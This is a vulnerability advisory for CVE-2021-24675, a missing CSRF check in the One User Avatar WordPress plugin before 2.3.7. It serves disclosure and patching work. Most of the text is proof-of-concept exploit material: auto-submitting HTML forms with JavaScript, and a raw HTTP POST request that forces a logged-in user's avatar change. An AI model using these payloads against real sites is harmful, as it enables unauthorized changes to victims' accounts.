One User Avatar < 2.3.7 – Avatar Update via CSRF | CVE 2021-24675

Description

The plugin does not check for CSRF when updating the Avatar in page where the [avatar_upload] shortcode is embed. As a result, attackers could make logged in user change their avatar via a CSRF attack

Proof of Concept

<!-- action is URL of a post that has avatar_upload shortcode. -->
<!-- You may need to try several times. -->
<form id="csrf" action="http://localhost/wordpress/?p=556&preview=true" method="post" enctype="multipart/form-data" target="_blank">
<input type="hidden" name="user_id" value="1">
<input type="hidden" name="wpua_action" value="update">
<input type="hidden" name="submit" value="Upload">
<input type="file" hidden name="wpua-file" id="file">
</form>
<button id="btn">Click</button>
<form id="secondary" action="http://localhost/wordpress/?p=556&preview=true" method="post" enctype="multipart/form-data">
<input type="hidden" name="user_id" value="1">
<input type="hidden" name="wpua_action" value="update">
<input type="hidden" name="submit" value="Update Profile">
</form>
<script>
fetch("https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg").then(res=>res.arrayBuffer()).then(b=>{d=new DataTransfer;d.items.add(new File([b],"csrf.jpg",{type:"image/jpeg"}));file.files=d.files;})
btn.onclick=()=>{HTMLFormElement.prototype.submit.call(csrf);HTMLFormElement.prototype.submit.call(csrf);setTimeout(()=>HTMLFormElement.prototype.submit.call(secondary),1000)}
</script>


<html>
  <body>
    <form action="http://example.com/one-user-avatar-avatar-upload/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="wp-user-avatar" value="1720" />
      <input type="hidden" name="wpua_action" value="update" />
      <input type="hidden" name="user_id" value="1" />
      <input type="hidden" name="submit" value="Update Profile" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POST /one-user-avatar-avatar-upload/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
Content-Length: 432
Connection: close
Cookie: [admin via CSRF]
Upgrade-Insecure-Requests: 1

-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="wp-user-avatar"

1718
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="wpua_action"

update
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="submit"

Update Profile
-----------------------------54331109111293931601238262353--